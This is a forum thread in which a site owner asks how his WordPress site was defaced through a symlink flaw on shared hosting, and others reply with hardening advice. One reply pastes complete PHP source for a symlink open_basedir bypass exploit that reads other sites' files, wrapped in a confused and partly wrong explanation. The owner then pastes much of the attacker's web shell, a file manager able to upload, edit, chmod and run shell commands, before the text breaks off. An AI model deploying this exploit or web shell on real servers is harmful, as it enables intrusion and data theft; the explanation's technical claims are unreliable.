1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

My site was hacked! (how can i protect myself?)

Discussion in 'BlackHat Lounge' started by IKbentim, Feb 27, 2012.

  1. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    Hey guys,

    just woke up to the news that my site was hacked, was fixed in 2 seconds they only replaced the index. But how did they do it?

    Checked the logs for my server and the guy came from this site
    http://www.distributedsystemsltd.com/Main/1/Sym.php?sws=sym

    Now this basically tells what and how to hack, but how can i protect myself against that sort of shenanigans?
     
  2. ziplack

    ziplack Senior Member

    Joined:
    Feb 18, 2010
    Messages:
    1,193
    Likes Received:
    603
    Location:
    BHW
    change your cpanel password
    check your themes for hideen hacks
    check your cpanel logs for activity
    change your wordpress password
    remove any nulled plugin
    recheck .htaccess (maybe its compromised)
    talk to your hosting provider (tell tham u were hacked) they need to check their logs
    update all your plugins
     
  3. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    Hi,

    Thanks for your post. I send my host a clear email with exactly what happened and exactly how they did it. And they send me back some email saying "make sure your password is safe and make sure your wordpress is up to date" i pay these guys hundreds of dollars for that shit.

    I've checked the logs and i know who's doing it. But the only way to stop it is to change something in Apache.. which i can't access.
     
  4. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    The "CEO" just contacted me on twitter saying i should be checking my computer for viruses because it happened on my side..

    Namecheap you were supposed to be the chosen one :'(

    http://youtu.be/HUBWxiu5cOo

    ugh, just did a whois on all the domains on the list turns out they're all hosted by namecheap.
     
    Last edited: Feb 27, 2012
  5. Dark-X

    Dark-X Newbie

    Joined:
    Feb 28, 2012
    Messages:
    0
    Likes Received:
    0
    That doesnt mean that its your fault.Your site may be hacked through other site there are a lots of way to do that,maybe the server was the target and everything gone wrong or maybe only your site was target.

    If you using WP,Joomla or what ever script you using the best way to protect is to dump the sql database than reinstall the script and reupload the sql.Change passwords on everything and allow only access to FTP,SSH on 2 or 3 IPs if they are static.Where is the admin directory put a password protection on it :) That will fix a lot of things and thats all i can remeber for now if you still have problems PM me we will talk on private :)
     
  6. BombaRuLz

    BombaRuLz Regular Member

    Joined:
    May 26, 2011
    Messages:
    202
    Likes Received:
    222
    Occupation:
    Web & Graphics Designer
    Location:
    Macedonia
    Don't worry dude, your site isn't hacked.There is just a way to upload index.html file without permissions. This happened to me few months ago and it's really annoying. It seems that "hackers" lol, can somehow upload a index.html file if there isn't any in the main folder (i guess you are using wordpress = index.php).

    Just chill and to be 100% change your file permissions on the files (the important ones) and make a backup more often.

    Cheers
     
  7. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    Hey, thanks for your message. Actually here have been some new developments.

    So yesterday after the Vice President of Namecheap tweeted me this

    [​IMG]

    I was a bit upset. I take care of my computer and i KNEW it wasn't me causing this. I just knew it, for multiple reasons. Like for one i don't download weird things and i'm 100% sure my computer isn't compromised.

    So did a little digging, the 'hacker' on my site came from a site that has a big list of sites that could be hacked using this method. The bug was in Apache and enabled people to 'view' php files in the browser. So if you open wp-config.php in the browser you get my database info. So then they log into my database they change the email address pointing to the admin account and request a new password. They then change the index of wordpress with some defaced page and that's it. Site = 'hacked'.

    So about the list, i did some whois of the domains and Namecheap kept showing up. I had a little text file pasted the whois site a couple of times and whoised about 50 domains. All hosted by name cheap.

    So i contact the Vice President again saying look at this list. Are you sure it's my computer? Because all the people on the list are hosted by name cheap.

    Then he send me that last tweet "i'm checking".

    Couple hours later i got this email they're going to chmod all files of all the people on name cheap with 600 so they can't be accessed by anything other than the server IP. So i asked them why they're blaiming me first and then do research and they send me.

    Anyway that's the story. A couple of months ago i also had a problem with my blackberry, i was too late with my hosting payment and when i paid (an hour later) i couldn't access my business emails anymore on my blackberry. Only my gmail still worked.. now i host everything with name cheap so it was either Blackberry or Namecheap messing up. When i send them an email at first they said contact Blackberry and they'll fix it for you. Then i asked again and they said contact Blackberry we can't do anything for you. Blackberry said it couldn't be them because my Gmail still worked on my blackberry and i send them the IP addresses of my webhost, they checked it and nothing was blocked. So i contact Namecheap again and they finally checked for me and it turned out the Blackberry IP's were blocked in their firewall. After four months i could finally open my business emails again on my blackberry.

    I like name cheap, they do great deals for people. Hosting is always up, they have a lot of interactive competitions like twitter quizzes and Facebook. But the customer service needs some work.

    /end of rant

    Feels good to vent! i can get on with my work now ;)
     
  8. Adam Xtubeage

    Adam Xtubeage Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 31, 2012
    Messages:
    143
    Likes Received:
    73
    Occupation:
    IM & ENJOYING LIFE & STUDYING....!
    Location:
    PARADISE
    hello mate,

    i am an pen tester...as i get it your site have no problem inside it...let me explain you in details...what happens is...and attacker tries to search a vulnerable sites in internet...it can be any type of vulnerability like SQL injection or cross site scripting commonly known as [XSS] vulnerability...when he gets it...instead of attacking the site directly..he finds the server in which it is hosted...through whois information...so that he can attack more then one site at a time....now if he get's a single site vulnerable on that particular host server...he can access any site through it..wheather it is vulnerable or not...:)


    may be this same thing happened with you...it's not your fault niether your servers fault..it's the fault of that particular vulnerable site...but as we know nobody can say that his site is vulnerable or not untill doing some tests...:)


    and you said he just replaced the index. ... that means he is just practising on your server...so it's nothing to worry...just do the things mentioned above by other mates...and do one more thing...write your server to do a "quick scan"" for vulnerable sites on it...i think your server did not do that for many days...


    and for securing your self...:

    there is no particular bot or software...which will give you protection against it...the only thing you can do is..
    1) keep checking your sites for SQL injection vulnerability
    2) for cross site scripting[XSS] vulnerability

    this two are the most common vulnerability which you find in present internet world...and let me tell you friends...this two are not so effective if done by a newbie...but they are severe if it is performed by a professional...

    and there are more 8 vulnerabilities found in todays internet world...but they are too dangerous to perform..so i cannot mention it here...really sorry for that..
    and if anyone is interested to know about them just pm me...i will explain you...:)

    I HOPE THIS HELPS A BIT MATE...


    KEEP MAKING UNCOUNTABLE WEBSITE BUT DON'T FORGET TO TEST IT...:D

    IF ANY DOUBT FEEL FREE TO ASK I AM THERE FOR SECURITY....:D
     
  9. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    But it wasn't a SQL injection it was a symlink exploit
     
  10. michaelr1988

    michaelr1988 Regular Member

    Joined:
    Apr 25, 2011
    Messages:
    470
    Likes Received:
    307
    Location:
    UK
    Hi man, sorry to hear that your site got hacked. Try these plugins if you are using wordpress:

    bulletproof security
    login lockdown
     
  11. Adam Xtubeage

    Adam Xtubeage Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 31, 2012
    Messages:
    143
    Likes Received:
    73
    Occupation:
    IM & ENJOYING LIFE & STUDYING....!
    Location:
    PARADISE
    yes...i know it was not SQLi and niether [xss] i just said that two for helping others to test it...and the one which you r telling "symlink exploit" is nothing other then a bypass for authorization...the thing which happens in this is the attacker get acces to your server through other vulnerable sites and requests and new page...i mean a new website created by him and hosted on some else server...[get the point plss he doesnot come out of your server and do his request instead he just request his page on your server]what he does is he redirects your site to his page and in rare cases it happpens that the destination url i mean his page url comes in your server log (it only happens if he is a newbie and is just practising) and this is done specially to steal confidential data...or you can say your private information like credit card,password details or some other important details, and other personal things...and if the server doesnot validate this new link i mean his page url...the attacker gets his gold out of your site....:D

    now if you are having my sql 5 and higher you error code will be something like this


    <?php
    /*
    PHP 5.2.12/5.3.1 symlink() open_basedir bypass

    CHUJWAMWMUZG
    */

    $fakedir="cx";
    $fakedep=16;

    $num=0; // offset of symlink.$num

    if(!empty($_GET['file'])) $file=$_GET['file'];
    else if(!empty($_POST['file'])) $file=$_POST['file'];
    else $file="";

    echo '<PRE><img
    src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit
    from <a
    href="http://securityreason.com/" title="Security Audit PHP">Security Audit
    Lab - SecurityReason</a> labs.
    <p>Script for legal use only.
    <p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
    <p>More: <a href="http://securityreason.com/">SecurityReason</a>
    <p><form name="form"
    action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
    "]).'" method="post"><input type="text" name="file" size="50"
    value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
    value="Create Symlink"></form>';

    if(empty($file))
    exit;

    if(!is_writable("."))
    die("not writable directory");

    $level=0;

    for($as=0;$as<$fakedep;$as++){
    if(!file_exists($fakedir))
    mkdir($fakedir);
    chdir($fakedir);
    }

    while(1<$as--) chdir("..");

    $hardstyle = explode("/", $file);

    for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
    if(!file_exists($hardstyle[$a]))
    mkdir($hardstyle[$a]);
    chdir($hardstyle[$a]);
    $as++;
    }
    }
    $as++;
    while($as--)
    chdir("..");

    @rmdir("fakesymlink");
    @unlink("fakesymlink");

    @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

    // this loop will skip allready created symlinks.
    while(1)
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
    "symlink".$num))) break;
    else $num++;

    @unlink("fakesymlink");
    mkdir("fakesymlink");

    die('<FONT COLOR="RED">check symlink <a
    href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

    ?>

    your details are free to go to the attacker now...:D

    HOPE THIS HELPS YOU....

    IF YOU HAVE ANY PROBLEM IN UNDERSTANDING JUST LET ME KNOW I WILL EXPLAIN YOU...:)

    I AM ALWAYS READY TO HELP OTHERS...:D
     
  12. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    Very nice of you, thanks. However i've fixed it by chmoding everything 600 and renaming my wp-config. People can still hack everything with a lot of effort, but i don't think they will.
     
  13. resistancee

    resistancee Registered Member

    Joined:
    Jun 22, 2011
    Messages:
    99
    Likes Received:
    40
    First clear your PC, boot into safe mode - Run Combofixer & Malware Malbytes. After that thoroughly check your FTP logs!
     
  14. Adam Xtubeage

    Adam Xtubeage Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 31, 2012
    Messages:
    143
    Likes Received:
    73
    Occupation:
    IM & ENJOYING LIFE & STUDYING....!
    Location:
    PARADISE
    YOU ARE MOST WELCOME MATE...:)
    As this exploit allows cross scripting between user account home directories. This is not a root exploit and if Apache is secured it is most likely not going to effect you. However if Apache is not secured it then allows attackers to use futher expoits to gain root access. I would highly suggest to lock down /bin/ln file. The most agrivating issue with this exploit is it allows quick linking between public_html directories to where many different sites are vulnerable to being vandalized. The exploit will link to the apache log files to map the virtual home directories and automates the symlink process. This exploit leaves the following footprint:

    ls -la --author /usr/local/apache/logs/fpcgisock
    srwx------ 1 nobody root nobody 0 Jul 1 21:05 /usr/local/apache/logs/fpcgisock=


    THIS WAS JUST A SUGGESTION FROM ME...SO THAT YOU DON'T GET THIS PROBLEM AGAIN...

    JUST TRYING TO HELP YOU SECURE YOURSELF FROM GETTING HACKED FURTHER...:D
     
    Last edited: Feb 28, 2012
  15. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    @sumit2531
    stop posting random old shit you just found on google

    "cPanel Symlink Exploit, Security Advisory July 21 2008"

    Date : 13.11.2009

    WTF?!?


    after reading this thread i would say the problem was(or still is) a poorly configured apache server that allowed you to use "FollowSymLinks", you could test this with a simple .htaccess = "Options +FollowSymLinks"


    kudos to IKbentim for figuring this all out and telling namecheap!
     
    • Thanks Thanks x 1
  16. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    This is what they replaced my index with in wordpress

    Code:
    
    <?php
    /*
     * TeaM HacKer EgypT - a simple Web-based file manager
     * Copyright (C) 2004  TeaM HacKer EgypT <>
     *
     * This program is free software; you can redistribute it and/or modify
     * it under the terms of the GNU General Public License as published by
     * the Free Software Foundation; either version 2 of the License, or
     * (at your option) any later version.
     *
     * This program is distributed in the hope that it will be useful,
     * but WITHOUT ANY WARRANTY; without even the implied warranty of
     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
     * GNU General Public License for more details.
     *
     * You should have received a copy of the GNU General Public License
     * along with this program; if not, write to the Free Software
     * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
     *
     * -------------------------------------------------------------------------
     * While using this script, do NOT navigate with your browser's back and
     * forward buttons! Always open files in a new browser tab!
     * -------------------------------------------------------------------------
     *
     * This is Version 0.9, revision 9
     * =========================================================================
     *
     * Changes of revision 9
     * <>
     *    added workaround for directory listing, if lstat() is disabled
     *    fixed permisson of uploaded files (thanks to Stephan Duffner)
     *
     * Changes of revision 8
     * <okankan@stud.sdu.edu.tr>
     *    added Turkish translation
     * <j@kub.cz>
     *    added Czech translation
     * <>
     *    improved charset handling
     *
     * Changes of revision 7
     * <szuniga@vtr.net>
     *    added Spanish translation
     * <lars@soelgaard.net>
     *    added Danish translation
     * <>
     *    improved rename dialog
     *
     * Changes of revision 6
     * <nederkoorn@tiscali.nl>
     *    added Dutch translation
     *
     * Changes of revision 5
     * <>
     *    added language auto select
     *    fixed symlinks in directory listing
     *    removed word-wrap in edit textarea
     *
     * Changes of revision 4
     * <daloan@guideo.fr>
     *    added French translation
     * <anders@wiik.cc>
     *    added Swedish translation
     *
     * Changes of revision 3
     * <nzunta@gabriele-erba.it>
     *    improved Italian translation
     *
     * Changes of revision 2
     * <>
     *    got images work in some old browsers
     *    fixed creation of directories
     *    fixed files deletion
     *    improved path handling
     *    added missing word 'not_created'
     * <till@tuxen.de>
     *    improved human readability of file sizes
     * <nzunta@gabriele-erba.it>
     *    added Italian translation
     *
     * Changes of revision 1
     * <>
     *    TeaM HacKer EgypT completely rewritten:
     *    - clean XHTML/CSS output
     *    - several files selectable
     *    - support for windows servers
     *    - no more treeview, because
     *      - TeaM HacKer EgypT is a >simple< file manager
     *      - performance problems (too much additional code)
     *      - I don't like: frames, java-script, to reload after every treeview-click
     *    - execution of shell scripts
     *    - introduced revision numbers
     *
    /* ------------------------------------------------------------------------- */
    
    /* Your language:
     * 'en' - English
     * 'de' - German
     * 'fr' - French
     * 'it' - Italian
     * 'nl' - Dutch
     * 'se' - Swedish
     * 'sp' - Spanish
     * 'dk' - Danish
     * 'tr' - Turkish
     * 'cs' - Czech
     * 'auto' - autoselect
     */
    $lang = 'auto';
    
    /* Charset of output:
     * possible values are described in the charset table at
     * http://www.php.net/manual/en/function.htmlentities.php
     * 'auto' - use the same charset as the words of my language are encoded
     */
    $site_charset = 'auto';
    
    /* Homedir:
     * For example: './' - the script's directory
     */
    $homedir = './';
    
    /* Size of the edit textarea
     */
    $editcols = 80;
    $editrows = 25;
    
    /* -------------------------------------------
     * Optional configuration (remove # to enable)
     */
    
    /* Permission of created directories:
     * For example: 0705 would be 'drwx---r-x'.
     */
    # $dirpermission = 0705;
    
    /* Permission of created files:
     * For example: 0604 would be '-rw----r--'.
     */
    # $filepermission = 0604;
    
    /* Filenames related to the apache web server:
     */
    $htaccess = '.htaccess';
    $htpasswd = '.htpasswd';
    
    /* ------------------------------------------------------------------------- */
    
    if (get_magic_quotes_gpc()) {
    	array_walk($_GET, 'strip');
    	array_walk($_POST, 'strip');
    	array_walk($_REQUEST, 'strip');
    }
    
    if (array_key_exists('image', $_GET)) {
    	header('Content-Type: image/gif');
    	die(getimage($_GET['image']));
    }
    
    if (!function_exists('lstat')) {
    	function lstat ($filename) {
    		return stat($filename);
    	}
    }
    
    $delim = DIRECTORY_SEPARATOR;
    
    if (function_exists('php_uname')) {
    	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    } else {
    	$win = ($delim == '\\') ? true : false;
    }
    
    if (!empty($_SERVER['PATH_TRANSLATED'])) {
    	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
    } elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
    	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
    } elseif (function_exists('getcwd')) {
    	$scriptdir = getcwd();
    } else {
    	$scriptdir = '.';
    }
    $homedir = relative2absolute($homedir, $scriptdir);
    
    $dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
    
    if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
    	$dir = relative2absolute($dir, $_POST['olddir']);
    }
    
    $directory = simplify_path(addslash($dir));
    
    $files = array();
    $action = '';
    if (!empty($_POST['submit_all'])) {
    	$action = $_POST['action_all'];
    	for ($i = 0; $i < $_POST['num']; $i++) {
    		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
    			$files[] = $_POST["file$i"];
    		}
    	}
    } elseif (!empty($_REQUEST['action'])) {
    	$action = $_REQUEST['action'];
    	$files[] = relative2absolute($_REQUEST['file'], $directory);
    } elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
    	$files[] = $_FILES['upload'];
    	$action = 'upload';
    } elseif (array_key_exists('num', $_POST)) {
    	for ($i = 0; $i < $_POST['num']; $i++) {
    		if (array_key_exists("submit$i", $_POST)) break;
    	}
    	if ($i < $_POST['num']) {
    		$action = $_POST["action$i"];
    		$files[] = $_POST["file$i"];
    	}
    }
    if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
    	$files[] = relative2absolute($_POST['create_name'], $directory);
    	switch ($_POST['create_type']) {
    	case 'directory':
    		$action = 'create_directory';
    		break;
    	case 'file':
    		$action = 'create_file';
    	}
    }
    if (sizeof($files) == 0) $action = ''; else $file = reset($files);
    
    if ($lang == 'auto') {
    	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
    		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
    	} else {
    		$lang = 'en';
    	}
    }
    
    $words = getwords($lang);
    
    if ($site_charset == 'auto') {
    	$site_charset = $word_charset;
    }
    
    $cols = ($win) ? 4 : 7;
    
    if (!isset($dirpermission)) {
    	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
    }
    if (!isset($filepermission)) {
    	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
    }
    
    if (!empty($_SERVER['SCRIPT_NAME'])) {
    	$self = html(basename($_SERVER['SCRIPT_NAME']));
    } elseif (!empty($_SERVER['PHP_SELF'])) {
    	$self = html(basename($_SERVER['PHP_SELF']));
    } else {
    	$self = '';
    }
    
    if (!empty($_SERVER['SERVER_SOFTWARE'])) {
    	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
    		$apache = true;
    	} else {
    		$apache = false;
    	}
    } else {
    	$apache = true;
    }
    
    switch ($action) {
    
    case 'view':
    
    	if (is_script($file)) {
    
    		/* highlight_file is a mess! */
    		ob_start();
    		highlight_file($file);
    		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
    		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
    		ob_end_clean();
    
    		html_header();
    		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
    
    <hr />
    
    <table>
    <tr>
    <td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
    <pre style="margin-top: 0"><code>';
    
    		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
    
    		echo '</code></pre>
    </td>
    <td style="text-align: left; vertical-align: top; padding-left: 3pt">
    <pre style="margin-top: 0">' . $src . '</pre>
    </td>
    </tr>
    </table>
    
    ';
    
    		html_footer();
    
    	} else {
    
    		header('Content-Type: ' . getmimetype($file));
    		header('Content-Disposition: filename=' . basename($file));
    
    		readfile($file);
    
    	}
    
    	break;
    
    case 'download':
    
    	header('Pragma: public');
    	header('Expires: 0');
    	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    	header('Content-Type: ' . getmimetype($file));
    	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
    	header('Content-Length: ' . filesize($file));
    
    	readfile($file);
    
    	break;
    
    case 'upload':
    
    	$dest = relative2absolute($file['name'], $directory);
    
    	if (@file_exists($dest)) {
    		listing_page(error('already_exists', $dest));
    	} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
    		@chmod($dest, $filepermission);
    		listing_page(notice('uploaded', $file['name']));
    	} else {
    		listing_page(error('not_uploaded', $file['name']));
    	}
    
    	break;
    
    case 'create_directory':
    
    	if (@file_exists($file)) {
    		listing_page(error('already_exists', $file));
    	} else {
    		$old = @umask(0777 & ~$dirpermission);
    		if (@mkdir($file, $dirpermission)) {
    			listing_page(notice('created', $file));
    		} else {
    			listing_page(error('not_created', $file));
    		}
    		@umask($old);
    	}
    
    	break;
    
    case 'create_file':
    
    	if (@file_exists($file)) {
    		listing_page(error('already_exists', $file));
    	} else {
    		$old = @umask(0777 & ~$filepermission);
    		if (@touch($file)) {
    			edit($file);
    		} else {
    			listing_page(error('not_created', $file));
    		}
    		@umask($old);
    	}
    
    	break;
    
    case 'execute':
    
    	chdir(dirname($file));
    
    	$output = array();
    	$retval = 0;
    	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
    
    	$error = ($retval == 0) ? false : true;
    
    	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
    
    	if ($error) {
    		listing_page(error('not_executed', $file, implode("\n", $output)));
    	} else {
    		listing_page(notice('executed', $file, implode("\n", $output)));
    	}
    
    	break;
    
    case 'delete':
    
    	if (!empty($_POST['no'])) {
    		listing_page();
    	} elseif (!empty($_POST['yes'])) {
    
    		$failure = array();
    		$success = array();
    
    		foreach ($files as $file) {
    			if (del($file)) {
    				$success[] = $file;
    			} else {
    				$failure[] = $file;
    			}
    		}
    
    		$message = '';
    		if (sizeof($failure) > 0) {
    			$message = error('not_deleted', implode("\n", $failure));
    		}
    		if (sizeof($success) > 0) {
    			$message .= notice('deleted', implode("\n", $success));
    		}
    
    		listing_page($message);
    
    	} else {
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    <table class="dialog">
    <tr>
    <td class="dialog">
    ';
    
    		request_dump();
    
    		echo "\t<b>" . word('really_delete') . '</b>
    	<p>
    ';
    
    		foreach ($files as $file) {
    			echo "\t" . html($file) . "<br />\n";
    		}
    
    		echo '	</p>
    	<hr />
    	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
    	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
    </td>
    </tr>
    </table>
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'rename':
    
    	if (!empty($_POST['destination'])) {
    
    		$dest = relative2absolute($_POST['destination'], $directory);
    
    		if (!@file_exists($dest) && @rename($file, $dest)) {
    			listing_page(notice('renamed', $file, $dest));
    		} else {
    			listing_page(error('not_renamed', $file, $dest));
    		}
    
    	} else {
    
    		$name = basename($file);
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    	<input type="hidden" name="action" value="rename" />
    	<input type="hidden" name="file" value="' . html($file) . '" />
    	<input type="hidden" name="dir" value="' . html($directory) . '" />
    	<b>' . word('rename_file') . '</b>
    	<p>' . html($file) . '</p>
    	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
    	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
    	<hr />
    	<input type="submit" value="' . word('rename') . '" />
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'move':
    
    	if (!empty($_POST['destination'])) {
    
    		$dest = relative2absolute($_POST['destination'], $directory);
    
    		$failure = array();
    		$success = array();
    
    		foreach ($files as $file) {
    			$filename = substr($file, strlen($directory));
    			$d = $dest . $filename;
    			if (!@file_exists($d) && @rename($file, $d)) {
    				$success[] = $file;
    			} else {
    				$failure[] = $file;
    			}
    		}
    
    		$message = '';
    		if (sizeof($failure) > 0) {
    			$message = error('not_moved', implode("\n", $failure), $dest);
    		}
    		if (sizeof($success) > 0) {
    			$message .= notice('moved', implode("\n", $success), $dest);
    		}
    
    		listing_page($message);
    
    	} else {
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    ';
    
    		request_dump();
    
    		echo "\t<b>" . word('move_files') . '</b>
    	<p>
    ';
    
    		foreach ($files as $file) {
    			echo "\t" . html($file) . "<br />\n";
    		}
    
    		echo '	</p>
    	<hr />
    	' . word('destination') . ':
    	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
    	<input type="submit" value="' . word('move') . '" />
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'copy':
    
    	if (!empty($_POST['destination'])) {
    
    		$dest = relative2absolute($_POST['destination'], $directory);
    
    		if (@is_dir($dest)) {
    
    			$failure = array();
    			$success = array();
    
    			foreach ($files as $file) {
    				$filename = substr($file, strlen($directory));
    				$d = addslash($dest) . $filename;
    				if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
    					$success[] = $file;
    				} else {
    					$failure[] = $file;
    				}
    			}
    
    			$message = '';
    			if (sizeof($failure) > 0) {
    				$message = error('not_copied', implode("\n", $failure), $dest);
    			}
    			if (sizeof($success) > 0) {
    				$message .= notice('copied', implode("\n", $success), $dest);
    			}
    
    			listing_page($message);
    
    		} else {
    
    			if (!@file_exists($dest) && @copy($file, $dest)) {
    				listing_page(notice('copied', $file, $dest));
    			} else {
    				listing_page(error('not_copied', $file, $dest));
    			}
    
    		}
    
    	} else {
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    ';
    
    		request_dump();
    
    		echo "\n<b>" . word('copy_files') . '</b>
    	<p>
    ';
    
    		foreach ($files as $file) {
    			echo "\t" . html($file) . "<br />\n";
    		}
    
    		echo '	</p>
    	<hr />
    	' . word('destination') . ':
    	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
    	<input type="submit" value="' . word('copy') . '" />
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'create_symlink':
    
    	if (!empty($_POST['destination'])) {
    
    		$dest = relative2absolute($_POST['destination'], $directory);
    
    		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
    
    		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
    
    		if (!@file_exists($dest) && @symlink($file, $dest)) {
    			listing_page(notice('symlinked', $file, $dest));
    		} else {
    			listing_page(error('not_symlinked', $file, $dest));
    		}
    
    	} else {
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog" id="symlink">
    <tr>
    	<td style="vertical-align: top">' . word('destination') . ': </td>
    	<td>
    		<b>' . html($file) . '</b><br />
    		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
    		<label for="checkbox_relative">' . word('relative') . '</label>
    		<input type="hidden" name="action" value="create_symlink" />
    		<input type="hidden" name="file" value="' . html($file) . '" />
    		<input type="hidden" name="dir" value="' . html($directory) . '" />
    	</td>
    </tr>
    <tr>
    	<td>' . word('symlink') . ': </td>
    	<td>
    		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
    		<input type="submit" value="' . word('create_symlink') . '" />
    	</td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'edit':
    
    	if (!empty($_POST['save'])) {
    
    		$content = str_replace("\r\n", "\n", $_POST['content']);
    
    		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
    			listing_page(notice('saved', $file));
    		} else {
    			listing_page(error('not_saved', $file));
    		}
    
    	} else {
    
    		if (@is_readable($file) && @is_writable($file)) {
    			edit($file);
    		} else {
    			listing_page(error('not_edited', $file));
    		}
    
    	}
    
    	break;
    
    case 'permission':
    
    	if (!empty($_POST['set'])) {
    
    		$mode = 0;
    		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
    		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
    		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
    
    		if (@chmod($file, $mode)) {
    			listing_page(notice('permission_set', $file, decoct($mode)));
    		} else {
    			listing_page(error('permission_not_set', $file, decoct($mode)));
    		}
    
    	} else {
    
    		html_header();
    
    		$mode = fileperms($file);
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    
    	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
    
    	<hr />
    
    	<table id="permission">
    	<tr>
    		<td></td>
    		<td style="border-right: 1px solid black">' . word('owner') . '</td>
